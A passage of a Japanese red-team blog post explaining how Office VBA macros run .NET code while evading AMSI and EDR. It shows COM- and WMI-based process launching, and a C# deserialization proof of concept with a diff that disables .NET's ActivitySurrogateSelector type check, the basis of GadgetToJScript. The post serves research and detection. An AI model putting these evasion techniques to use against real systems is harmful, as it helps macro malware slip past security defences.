<!DOCTYPE html>
<html lang="ja-JP"><head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta name="generator" content="Hugo 0.68.3" />
	
	<link rel="icon" href="/img/favicon.ico">
	
	<title>GadgetToJScript を利用した Office VBA のAMSI バイパスと原理 | Shooting!!!</title>
	
	
	<script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "Shooting!!!",
    
    "url": "https:\/\/www.shutingrz.com\/"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/www.shutingrz.com\/"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/www.shutingrz.com\/",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/www.shutingrz.com\/post\/explore-dotnet-serialize-g2js\/",
          "name": "Gadget to j script を利用した office v b a の a m s i バイパスと原理"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : ""
  },
  "headline": "GadgetToJScript を利用した Office VBA のAMSI バイパスと原理",
  "description" : "しゅーとです。普段は IoT 機器のリバースエンジニアリングを生業としていますが、最近は流行に乗ってRed Teaming の研究もしています。 今回は WSH (vbs, js, hta) と Office マ",
  "inLanguage" : "en",
  "wordCount":  9939 ,
  "datePublished" : "2020-11-16T18:41:10",
  "dateModified" : "2020-11-16T18:41:10",
  "image" : "https:\/\/www.shutingrz.com\/img\/favicon.ico",
  "keywords" : [ "pentest, bypass" ],
  "mainEntityOfPage" : "https:\/\/www.shutingrz.com\/post\/explore-dotnet-serialize-g2js\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/www.shutingrz.com\/",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/www.shutingrz.com\/img\/favicon.ico",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>

<meta property="og:title" content="GadgetToJScript を利用した Office VBA のAMSI バイパスと原理" />
<meta property="og:description" content="しゅーとです。普段は IoT 機器のリバースエンジニアリングを生業としていますが、最近は流行に乗ってRed Teaming の研究もしています。 今回は WSH (vbs, js, hta) と Office マ">
<meta property="og:image" content="https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/images/cover.png" />
<meta property="og:url" content="https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Shooting!!!" />
  <meta name="twitter:title" content="GadgetToJScript を利用した Office VBA のAMSI バイパスと原理" />
  <meta name="twitter:description" content="しゅーとです。普段は IoT 機器のリバースエンジニアリングを生業としていますが、最近は流行に乗ってRed Teaming の研究もしています。 今回は WSH (vbs, js, hta) と Office マ">
  <meta name="twitter:image" content="https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/images/cover.png" />
  <meta name="twitter:card" content="summary" /> 
	

	<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp"
	 crossorigin="anonymous">
	<link href="https://fonts.googleapis.com/css?family=Righteous%7CMerriweather:300,300i,400,400i,700,700i" rel="stylesheet">
	<link href="/css/medium.css" rel="stylesheet">
	<link href="/css/additional.css" rel="stylesheet">

	
	
	<link rel="stylesheet" href="/css/codeblock.css" integrity="" crossorigin="anonymous" media="screen">
	<link rel="stylesheet" href="/css/code-default.css" integrity="" crossorigin="anonymous" media="screen">
	<link rel="stylesheet" href="/css/table.css" integrity="" crossorigin="anonymous" media="screen">
	<link rel="stylesheet" href="/css/custom-font.css" integrity="" crossorigin="anonymous" media="screen">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-light bg-white fixed-top mediumnavigation nav-down">
    <div class="container pr-0">
        
        <a class="navbar-brand" href="https://www.shutingrz.com//">

            
            <img src="/img/favicon.ico" alt="logo">
            
        </a>
        

        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarMediumish" aria-controls="navbarSupportedContent"
            aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>

        
        <div class="collapse navbar-collapse" id="navbarMediumish">
            
            <ul class="navbar-nav ml-auto">
                 
                <li class="nav-item ">
                    <a class="nav-link" href="/post">Blog</a>
                </li>
                 
                <li class="nav-item ">
                    <a class="nav-link" href="/pages/about">About</a>
                </li>
                 
                <li class="nav-item ">
                    <a class="nav-link" href="https://twitter.com/shutingrz">Twitter</a>
                </li>
                
            </ul>
        </div>
        
    </div>
</nav>


        <div class="site-content">   
            <div class="container">
<div class="mainheading">
    <h1 class="sitetitle"><a href="/post">Shooting!!!</a></h1>
    <p class="lead">
         Big Brother is watching you
    </p>
</div><div class="main-content">
        
        <div class="container">
            <div class="row">
                
                <div class="col-md-2 pl-0"><div class="share sticky-top sticky-top-offset">
    <p>Share</p>
    <ul>
        <li class="ml-1 mr-1">
        <a target="_blank" href="https://twitter.com/intent/tweet?text=GadgetToJScript%20%e3%82%92%e5%88%a9%e7%94%a8%e3%81%97%e3%81%9f%20Office%20VBA%20%e3%81%aeAMSI%20%e3%83%90%e3%82%a4%e3%83%91%e3%82%b9%e3%81%a8%e5%8e%9f%e7%90%86&url=https%3a%2f%2fwww.shutingrz.com%2fpost%2fexplore-dotnet-serialize-g2js%2f" onclick="window.open(this.href, 'twitter-share', 'width=550,height=435');return false;">
        <i class="fab fa-twitter"></i>
        </a>
        </li>
        
        <li class="ml-1 mr-1">
        <a target="_blank" href="https://facebook.com/sharer.php?u=https%3a%2f%2fwww.shutingrz.com%2fpost%2fexplore-dotnet-serialize-g2js%2f" onclick="window.open(this.href, 'facebook-share', 'width=550,height=435');return false;">
        <i class="fab fa-facebook-f"></i>
        </a>
        </li>

        <li class="ml-1 mr-1">
        <a target="_blank" href="https://www.xing.com/spi/shares/new?url=https%3a%2f%2fwww.shutingrz.com%2fpost%2fexplore-dotnet-serialize-g2js%2f" onclick="window.open(this.href, 'xing-share', 'width=550,height=435');return false;">
        <i class="fab fa-xing"></i>
        </a>
        </li>        
    </ul>

    
</div>
</div>
                                
                <div class="col-md-9 flex-first flex-md-unordered">
                    <div class="mainheading">
                        	
                        
                        
                        
                        <div class="row post-top-meta">
                            <div class="col-xs-12 col-md-3 col-lg-2 text-center text-md-left mb-4 mb-md-0 md-nopad-right">
                                <img class="author-thumb" src="/img/prof.png" alt="しゅーと (@shutingrz)">
                            </div>
                            <div class="col-xs-12 col-md-9 col-lg-10 text-center text-md-left md-nopad-left">
                                <a target="_blank" class="link-dark">しゅーと (@shutingrz)</a><br>
                                <span class="author-description">
                                    Security researcher<br>
                                    <i class="far fa-star"></i>
                                    Nov 16, 2020
                                    <i class="far fa-clock clock"></i>
                                    20 min read
                                </span>					
                            </div>
                        </div>			
                        	
                        
                              
                        
                        <h1 class="posttitle">GadgetToJScript を利用した Office VBA のAMSI バイパスと原理</h1> 
                        
                        <div class="after-post-tags">
                            <ul class="tags">
                            
                            <li>
                            <a href="/tags/pentest">pentest</a>
                            </li>
                            
                            <li>
                            <a href="/tags/bypass">bypass</a>
                            </li>
                            
                            </ul>
                        </div>
                    </div>

                    
                        <img class="featured-image img-fluid" src="https://www.shutingrz.com/post/explore-dotnet-serialize-g2js/images/cover.png" alt="thumbnail for this post">
                    
                    

                    
                    <div class="article-post">
                        <p>しゅーとです。普段は IoT 機器のリバースエンジニアリングを生業としていますが、最近は流行に乗ってRed Teaming の研究もしています。</p>
<p>今回は WSH (vbs, js, hta) と Office マクロ事情を追ってみました。</p>
<p>WSH (Windows Script Host) は Windows に搭載されているスクリプトエンジンで、VBScript と JScript を実行できます。 Office マクロで動作する機能・言語は様々ありますが、一般的なのは VBA (Visual Basic for Application) です。WSH、特に VBScript と VBA は構文はほとんど同じですが、実行環境は割と違っていたりします。</p>
<h2 id="ステルス性の高いデシアライズ手法">ステルス性の高いデシアライズ手法</h2>
<p>ここ数年の Red Teaming では .NET プログラムを利用したオペレーションが流行っています。</p>
<p>Red Teaming の Initial access は様々なものが存在しますが、特に Windows ユーザの被害が大きいと考えられるのは Office マクロを用いたマルウェア感染です。<a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> からマルウェア感染のパターンを調査したところ、プロセス生成やプロセスインジェクションを伴わないステルスな手法として「<strong>デシアライズによる .NET プログラムの実行</strong>」を行っているアクターがいくつか存在しました。</p>
<ul>
<li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/">CactusTorch Fileless Threat Abuses .NET to Infect Victims</a></li>
<li><a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/11-10-2019/Analysis.md">The SideWinder campaign continue</a></li>
<li><a href="https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/">Release the Kraken: Fileless injection into Windows Error Reporting service</a></li>
</ul>
<p>デシアライズ手法を用いるビルダーとして有名なものとして、「DotNetToJScript」(以降、D2JS) が存在します。しかし、本ツールは .NET 4.8 で対策され、<strong>現在の Windows 環境では利用できません</strong>。しかし今では .NET 4.8 に対応したツール「GadgetToJScript」(以降、G2JS) が登場しており、これから先もステルス性の高い侵害手法として利用されることが予想されます。しかし D2JS、特に G2JS の具体的な原理については日本語ではおろか海外文献でもまとまった資料がありません。</p>
<p>本記事では実際に Office マクロのセキュリティ機構、.NET プログラムのデシアライズ手法の検証を行い、D2JS の対策と、それをバイパスする G2JS の手法を説明し、最後に検知に関する観点を記載します。</p>
<h1 id="vba-で-net-プログラムを実行する手法">VBA で .NET プログラムを実行する手法</h1>
<p>デシアライズ手法の前に、まずは VBA でどうやって .NET プログラムを実行するか、簡単な手法から紹介します。</p>
<h2 id="プロセス実行">プロセス実行</h2>
<p>WSH / VBA には当然プログラムを指定して実行する機能が存在します。</p>
<h3 id="wscriptshell-経由">WScript.Shell 経由</h3>
<pre><code class="language-vbscript" data-lang="vbscript">CreateObject(&quot;WScript.Shell&quot;).Run &quot;calc.exe&quot;
CreateObject(&quot;WScript.Shell&quot;).Exec &quot;notepad.exe&quot;
</code></pre><p>Shell オブジェクトを生成してプログラムを実行する一番ベーシックな方法です。JScript では ActiveXObject を利用して同様の操作が可能です。</p>
<p>これを使って .NET プログラムを呼び出せばいいですし、PowerShell を呼び出せばそこからスクリプトを使ってファイルレスで .NET プログラムを読み込むことができます。下は .NET の MessageBox を実行する PowerShell コードです。</p>
<p><img src="images/wshshell_powershell.png" alt="wshshell_powershell"></p>
<p><img src="images/net_from_ps_from_wsh.png" alt="net_from_ps_from_wsh"></p>
<p>この方法であれば、PowerShell 側で検知回避をすることで何の障害もなく .NET プログラムを読み込み可能です。</p>
<p>Emotet ダウンローダーをはじめとした Office マクロを悪用したマルウェアは、だいたいこの手法を使ってマルウェアをダウンロードし実行しています。（コードを難読化しているくらいです）</p>
<p>じゃあそれ使えば解決ではないか、という声が聞こえてきそうです。はい。現時点の世界のセキュリティ対策の主流ではこれでいけます。ただ PowerShell プロセスの生成を行っているので次世代の EDR 製品にはかなりの確率で検知されます。</p>
<h3 id="wmi-経由">WMI 経由</h3>
<p>オブジェクトを生成して利用するほかに、既にコンピュータで生成されている WMI の Win32_Process オブジェクトを呼び出してプログラムを実行する方法があります。</p>
<div class="highlight"><pre class="chroma"><code class="language-vb" data-lang="vb"><span class="n">r</span> <span class="o">=</span> <span class="n">GetObject</span><span class="p">(</span><span class="s">&#34;winmgmts:\\.\root\cimv2:Win32_Process&#34;</span><span class="p">).</span><span class="n">Create</span><span class="p">(</span><span class="s">&#34;calc.exe&#34;</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="n">intProcessID</span><span class="p">)</span>
</code></pre></div><p>こちらは WMI を利用するため、Winmgmt サービスが実行している必要があります。なおこちらもプロセス生成が行われます。</p>
<h3 id="com-オブジェクト経由">COM オブジェクト経由</h3>
<p>Windows に多数登録されている COM オブジェクトを利用してプロセスを生成することもできます。</p>
<p>ShellWindows オブジェクト は  Document.Application プロパティを持っていますが、このプロパティには ShellExecute メソッドという任意のプロセスを生成するメソッドを持っています。このプロパティを通して ShellExecute メソッドを呼ぶことでプログラムを実行できます。</p>
<p><img src="images/vba_com_exec.png" alt="vba_com_exec"></p>
<p><code>9BA05972-F6A8-11CF-A442-00A0C90A8F39</code> は ShellWindows オブジェクトの CLSID です。</p>
<p>これまで紹介した WScript.Shell および WMI 経由のプロセス生成は、Office マクロで利用する際は Office プログラム(winword.exe, excel.exe)の子プロセスとして実行されます。</p>
<p>Windows にはシステムの堅牢性を上げるために、 <strong>Exploit Protection</strong> という機能が存在します。この機能には、指定したプログラムによる子プロセス生成を防止する項目が存在します。そのため Exploit Protection にて子プロセスの生成を防止していた場合、実行がブロックされます。しかしこの方法であれば COM オブジェクト経由で実行されるため、COMオブジェクトを持つプロセスが親プロセスとなり、Exploit Protection の制限をバイパス可能です。なお ShellWindows オブジェクトを公開しているのは  explorer.exe なので、 explorer.exe が親プロセスとなります。</p>
<p><img src="images/shellwindows_process.jpg" alt="shellwindows_process"></p>
<blockquote>
<p>COM オブジェクトを利用したプロセス生成は他にも様々ありますが、ここでは省略します。</p>
</blockquote>
<p>しかしこのコードは、Windows Defender (+クラウド提供による保護) を有効にしていると、実行時に検知され、実行できません。</p>
<p><img src="images/detect_mal_macro.png" alt="detect_mal_macro"></p>
<p>このようにファイル生成時には検知しなくても、実行時に検知するのは <strong>AMSI</strong> によるものです。</p>
<h2 id="vbaとamsi">VBAとAMSI</h2>
<p>ここまでに複数の方法でプロセスを起動する方法を書いてきました。</p>
<p>最初の <code>CreateObject(&quot;WScript.Shell&quot;)</code>  は実際の業務でも利用されることもありアンチウイルスソフトでは検知されませんが、最後の COM オブジェクトを使ったプロセス実行手法は VBA では通常利用されることは少なく、こういったコードが含まれている xlsm ファイルはマクロ実行時にアンチウイルスソフトに検知されることがあります。</p>
<h3 id="vba-の-amsi-スキャンエンジン">VBA の AMSI スキャンエンジン</h3>
<p>上の COM オブジェクトの単純な呼び出しに関しては問題ありませんが、実際に CreateThread などコードインジェクションを行うようなコードは、ファイルを生成された時点でアンチウイルスソフトに検知されます。以下は metasploit で生成した、<code>net user</code> を実行させるシェルコードを含んだ VBA です。</p>
<p><img src="images/create_thread_net_vba.png" alt="create_thread_net_vba"></p>
<p>以下のようにファイル作成時、Windows Defender に検知されます。</p>
<p><img src="images/create_thread_net_vba_detect.png" alt="create_thread_net_vba_detect"></p>
<p>このような場合に攻撃者がとる行動は、より高度な難読化です。難読化を行うことでファイルに対する検知を回避することが可能です。</p>
<p><img src="images/obf_create_thread_net_vba.png" alt="obf_create_thread_net_vba"></p>
<p>しかしファイルに対する検知回避だけでは不十分です。VBA は実行時に、VBA エンジン(VBE7.DLL) に搭載されている <strong>AMSI</strong> によって API 呼び出し直前の状態でマッチングされてしまいます。下記は API Monitor で excel.exe の <code>AmsiScanString</code> 呼び出しにブレークポイントを設置し、実行時にブレークされたときの画面です。</p>
<p><img src="images/apimonitor_break.png" alt="apimonitor_break"></p>
<p>AmsiScanString() の2つ目の引数から、VirtualAlloc の呼び出し時点の引数が全て復元された状態でスキャンが動作していることがわかります。</p>
<pre><code>&quot;kernel32.VirtualAlloc(0000000000000000,000000000000011f,0000000000001000,0000000000000040);
kernel32.RtlMoveMemory(,H,0000000000000001);
kernel32.RtlMoveMemory(,00000292c4ba3498,0000000000000001);
...
</code></pre><p><strong>AMSI</strong> とは Antimalware Scan Interfaceの略で、アンチウイルスソフトに依存しない、悪意のあるコンテンツをスキャンするインターフェースです。アンチウイルスソフトは AMSI を利用して<strong>メモリ</strong>上に読み込まれるコンテンツをスキャンできます。</p>
<p>AMSI が動作するランタイムは複数あり、現在は PowerShell, WSH, VBA, .NET のランタイム用エンジンが存在します。これらのランタイムによってそれぞれエンジンの動作は異なります。</p>
<p>VBA エンジンでは COM オブジェクトや Win32API の全ての呼び出しがふるまいログとして記録され、特定のトリガーによって AMSI プロバイダーにスキャンされるようになっています。</p>
<p><img src="images/fig2-runtime-scanning-amsi-8.png" alt="fig2-runtime-scanning-amsi-8"></p>
<p>これらの動作の詳細は <a href="https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/">Microsoft が解説</a>しています。</p>
<h3 id="bypass-amsi">Bypass AMSI</h3>
<p>しかし VBA エンジン (VBE7.DLL) にはいくつかの穴が存在します。COM オブジェクト、Win32API の呼び出しでログが記録されますが、その呼び出しに AMSI のトリガーとなる文字列が含まれなければ AMSI スキャンは走らないのです。</p>
<p>下記は <a href="https://github.com/synacktiv/AMSI-Bypass">Synactiv が公開した</a>、AMSI トリガーとなる Win32API および COM オブジェクトのメソッド名の一部です。</p>
<ul>
<li>
<p>Win32API<br>
<img src="images/amsi_trigger_win32.png" alt="amsi_trigger_win32"></p>
</li>
<li>
<p>COM Object<br>
<img src="images/amsi_trigger_com.png" alt="amsi_trigger_com"></p>
</li>
</ul>
<p>これは VBE7.DLL をリバースエンジニアリングしてトリガーとなる CRC32 ハッシュを抽出し、文字列と突合したものです。</p>
<blockquote>
<p>ここに記載したのは一部であり、Synactiv が作成したリストの全ては当該リンクを確認してください。ただしリンク先のリストは全てのトリガーをカバーした完全なデータではありません。</p>
</blockquote>
<p>このように VBA の AMSI エンジンは完全ではなく、トリガーに引っかからない API のみを利用すれば AMSI バイパスが行えることがわかります。しかしリストには侵害時によく利用するものが含まれているので、そのまま API を呼び出して侵害を行うのは困難です。</p>
<p>これの対抗策として 攻撃者・RedTeamer は複数の手法を開発しています。</p>
<ul>
<li>外部プログラムにメイン処理を丸投げ
<ul>
<li>PowerShell に引数を与えて実行  (→大多数のダウンローダが行う手法)</li>
<li>悪性ファイルをドロップして何らかの方法で実行</li>
</ul>
</li>
<li>VBA でメイン処理を行わない
<ul>
<li>DDE、Excel4.0 は AMSI に対応していないため AMSI を気にしなくてよくなる</li>
</ul>
</li>
<li>AMSI にトリガーされないように工夫して侵害を行う</li>
</ul>
<p>これらの手法には一長一短があります。特に一番最初の丸投げ手法は VBA の実装が楽な分、プロセス生成を伴ったりファイルのドロップが必要になるケースがあって、別のスキャン手法で検知される可能性が高いです。</p>
<p>最後の AMSI トリガーを回避する手法は実装が大きくなりがちですが、一度回避手法を確立してしまえば対策されるまでは非常に有効な手段になります。</p>
<p>ちなみに2つ目の DDE, Excel4.0 は現在は有効なパターンが多いですが、最近のアンチウイルスソフトはこれらを多く利用している時点で検知してくるようなので銀の弾丸というわけでもありません。</p>
<p>今回紹介する GadgetToJScript (G2JS) は工夫して侵害するパターンです。ただし基本的な実装は G2JS 側で肩代わりしてくれるので、利用者側は難読化処理を施すだけで利用可能です。</p>
<h1 id="gadgettojscript-を利用した-net-プログラムの読み込み">GadgetToJScript を利用した .NET プログラムの読み込み</h1>
<p>今回メインとなる話がこれです。</p>
<p>プロセス生成の項で、WSH が GetObject (VBScript) あるいは ActiveXObject (JScript) を使って、COM オブジェクトを利用できることを示しました。</p>
<p>この手法は、COM オブジェクトを経由して .NET オブジェクトを読み込むことができないかという発想からきています。根本的な原理については <a href="">James Forshaw 氏のブログ記事</a>を読むと理解が進むのでぜひ読んでください。</p>
<p>この手法は COM オブジェクトを操作できるあらゆるプログラミング言語で適用できます。氏のブログでは C# で PoC が書かれていましたが、それを WSH / VBA でもかけるという話です。</p>
<h2 id="デシリアライズの原理">デシリアライズの原理</h2>
<p>D2JS、G2JS の説明の前に、本記事でも C# で実際に &ldquo;Hello, World&rdquo; という値を持つ String オブジェクトをシリアライズ・デシアライズできることを確認してみましょう。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.IO</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Serialization</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Serialization.Formatters.Binary</span><span class="p">;</span>

<span class="cm">/**
</span><span class="cm">    Ref:
</span><span class="cm">    https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html
</span><span class="cm">    https://github.com/med0x2e/GadgetToJScript
</span><span class="cm">    https://silentbreaksecurity.com/re-animating-activitysurrogateselector/
</span><span class="cm">**/</span>

<span class="c1">// Definitely non-serializable class.
</span><span class="c1"></span><span class="k">class</span> <span class="nc">NonSerializable</span> <span class="p">{</span>
  <span class="k">private</span> <span class="kt">string</span> <span class="n">_text</span><span class="p">;</span>

  <span class="k">public</span> <span class="n">NonSerializable</span><span class="p">(</span><span class="kt">string</span> <span class="n">text</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">_text</span> <span class="p">=</span> <span class="n">text</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">public</span> <span class="k">override</span> <span class="kt">string</span> <span class="n">ToString</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">_text</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Custom serialization surrogate
</span><span class="c1"></span><span class="k">class</span> <span class="nc">_SurrogateSelector</span> <span class="p">:</span> <span class="n">SurrogateSelector</span>
<span class="p">{</span>
    <span class="k">public</span> <span class="k">override</span> <span class="n">ISerializationSurrogate</span> <span class="n">GetSurrogate</span><span class="p">(</span><span class="n">Type</span> <span class="n">type</span><span class="p">,</span> <span class="n">StreamingContext</span> <span class="n">context</span><span class="p">,</span> <span class="k">out</span> <span class="n">ISurrogateSelector</span> <span class="n">selector</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">selector</span> <span class="p">=</span> <span class="k">this</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(!</span><span class="n">type</span><span class="p">.</span><span class="n">IsSerializable</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">Type</span> <span class="n">t</span> <span class="p">=</span> <span class="n">Type</span><span class="p">.</span><span class="n">GetType</span><span class="p">(</span><span class="s">&#34;System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35&#34;</span><span class="p">);</span>
            <span class="k">return</span> <span class="p">(</span><span class="n">ISerializationSurrogate</span><span class="p">)</span><span class="n">Activator</span><span class="p">.</span><span class="n">CreateInstance</span><span class="p">(</span><span class="n">t</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="k">base</span><span class="p">.</span><span class="n">GetSurrogate</span><span class="p">(</span><span class="n">type</span><span class="p">,</span> <span class="n">context</span><span class="p">,</span> <span class="k">out</span> <span class="n">selector</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">class</span> <span class="nc">Program</span>
<span class="p">{</span>
    <span class="k">static</span> <span class="k">void</span> <span class="n">TestObjectSerializedRef</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">BinaryFormatter</span> <span class="n">fmt</span> <span class="p">=</span> <span class="k">new</span> <span class="n">BinaryFormatter</span><span class="p">();</span>
        <span class="n">MemoryStream</span> <span class="n">stm</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">();</span>
        <span class="n">fmt</span><span class="p">.</span><span class="n">SurrogateSelector</span> <span class="p">=</span> <span class="k">new</span> <span class="n">_SurrogateSelector</span><span class="p">();</span>
        <span class="n">fmt</span><span class="p">.</span><span class="n">Serialize</span><span class="p">(</span><span class="n">stm</span><span class="p">,</span> <span class="k">new</span> <span class="n">NonSerializable</span><span class="p">(</span><span class="s">&#34;Hello World!&#34;</span><span class="p">));</span>
        <span class="n">stm</span><span class="p">.</span><span class="n">Position</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span>

        <span class="c1">// Should print Hello World!.
</span><span class="c1"></span>        <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">fmt</span><span class="p">.</span><span class="n">Deserialize</span><span class="p">(</span><span class="n">stm</span><span class="p">));</span>
    <span class="p">}</span>
    
    <span class="k">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="n">TestObjectSerializedRef</span><span class="p">();</span>
    <span class="p">}</span>
<span class="p">}</span>

</code></pre></div><p>このコードの説明をします。</p>
<p>自作クラス NonSerializable はコンストラクタで String オブジェクトを受け取るようにしています。また ToString をオーバーライドし String オブジェクトを返すようにします。ToString は、 <a href="https://docs.microsoft.com/ja-jp/dotnet/csharp/programming-guide/classes-and-structs/how-to-override-the-tostring-method">C# では全てのクラスが暗黙的に Object クラスを継承し、文字列表現をリターンできるようにしている</a> ため、Console.WriteLine() が呼ばれると、このクラスはコンストラクタで渡された &ldquo;Hello World!&ldquo;を返します。</p>
<blockquote>
<p>ただしこのクラスは Serializable アトリビュートを持っていないので、本来であればシリアライズできません。</p>
</blockquote>
<p>そんなクラスを SurrogateSelector.Serialize でシリアライズします。</p>
<p>Serialize は Serializable アトリビュートが付いたクラスしかシリアライズしませんが、SurrogateSelector クラスの GetSurrogate メソッドをオーバーライドし、シリアライズできないクラスでもサロゲートクラスに変換させるようにすることで<strong>任意のクラスをシリアライズできる</strong>ようにしています。</p>
<p>このコードをcsc.exeでコンパイルし、実行します。</p>
<p><img src="images/deserialize_exception.png" alt="deserialize_exception"></p>
<p>例外が発生しました。発生箇所は ObjectSurrogate.GetObjectDataです。</p>
<p><strong>これは最近の Windows10 / WindowsServer で予期された動作です。</strong></p>
<p>Forshaw 氏のブログが公開された後、Microsoft は ObjectSurrogate の任意にデシアライズできる実装について好ましく思っておらず、.NET 4.8 のアップデートでデシアライズ時の型チェックを行うようにしました。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="k">private</span> <span class="k">sealed</span> <span class="k">class</span> <span class="nc">ObjectSurrogate</span> <span class="p">:</span> <span class="n">ISerializationSurrogate</span>
<span class="p">{</span>
	<span class="k">public</span> <span class="k">void</span> <span class="n">GetObjectData</span><span class="p">(</span><span class="kt">object</span> <span class="n">obj</span><span class="p">,</span> <span class="n">SerializationInfo</span> <span class="n">info</span><span class="p">,</span> <span class="n">StreamingContext</span> <span class="n">context</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="k">if</span> <span class="p">(!</span><span class="n">AppSettings</span><span class="p">.</span><span class="n">DisableActivitySurrogateSelectorTypeCheck</span> <span class="p">&amp;&amp;</span>
			<span class="p">!(</span><span class="n">obj</span> <span class="k">is</span> <span class="n">ActivityBind</span><span class="p">)</span> <span class="p">&amp;&amp;</span> <span class="p">!(</span><span class="n">obj</span> <span class="k">is</span> <span class="n">DependencyObject</span><span class="p">))</span>
		<span class="p">{</span>
		   <span class="k">throw</span> <span class="k">new</span> <span class="n">ArgumentException</span><span class="p">(</span><span class="s">&#34;obj&#34;</span><span class="p">);</span>
		<span class="p">}</span>
		<span class="c1">// ...
</span><span class="c1"></span>	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div><p>追加されたのは <code>!AppSettings.DisableActivitySurrogateSelectorTypeCheck</code> です。この追加によって、シリアライズ化可能なオブジェクト以外をデシアライズすることはできなくなりました。</p>
<p>しかしこれは C# で実装する場合においては、該当のメンバを <code>True</code> にしてしまえば何も問題ありません。</p>
<p>上のコードを次の差分のように修正します。</p>
<div class="highlight"><pre class="chroma"><code class="language-diff" data-lang="diff"><span class="gu">@@ -2,6 +2,7 @@
</span><span class="gu"></span> using System.IO;
 using System.Runtime.Serialization;
 using System.Runtime.Serialization.Formatters.Binary;
<span class="gi">+using System.Configuration;
</span><span class="gi"></span>
<span class="gu">@@ -54,6 +55,7 @@
</span><span class="gu"></span>
     static void Main()
     {
<span class="gi">+        ConfigurationManager.AppSettings.Set(&#34;microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck&#34;, &#34;true&#34;);
</span><span class="gi"></span>         TestObjectSerializedRef();
     }
 }
</code></pre></div><p><img src="images/deserialize_ok.png" alt="deserialize_ok"></p>
<p>型チェックが無効になったため、シリアライズ・デシアライズに成功しました。これが .NET 4.8 以降における強制シリアライズ手法です。</p>
<h3 id="dotnettojscript-の栄枯盛衰">DotNetToJScript の栄枯盛衰</h3>
<p>D2JS は COM コンポーネントを経由した .NET のデシアライズの原理をもとに、シリアライズしたクラスアセンブリを BinaryFormatter でデシリアライズし、クラスコンストラクタを呼び出すスクリプトを作成するビルダーツールです。本ツールは Nick 氏 (@monoxgas) によって作成されました。</p>
<p>本ツールでは引数に .NET クラスアセンブリを指定することで、アセンブリがシリアライズされ、JScript や VBSciprt、VBA などのスクリプト言語でデシアライズするスクリプトが生成されます。</p>
<p>なお呼び出される .NET プログラム側では、COM コンポーネント経由で呼び出されるように ComVisible アトリビュートを付けたうえでコンパイルをする必要があります。</p>
<blockquote>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="na">[ComVisible(true)]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">TestClass</span>
<span class="p">{</span>
<span class="p">...</span>
</code></pre></div></blockquote>
<p>次のコードが D2J で出力したものです。</p>
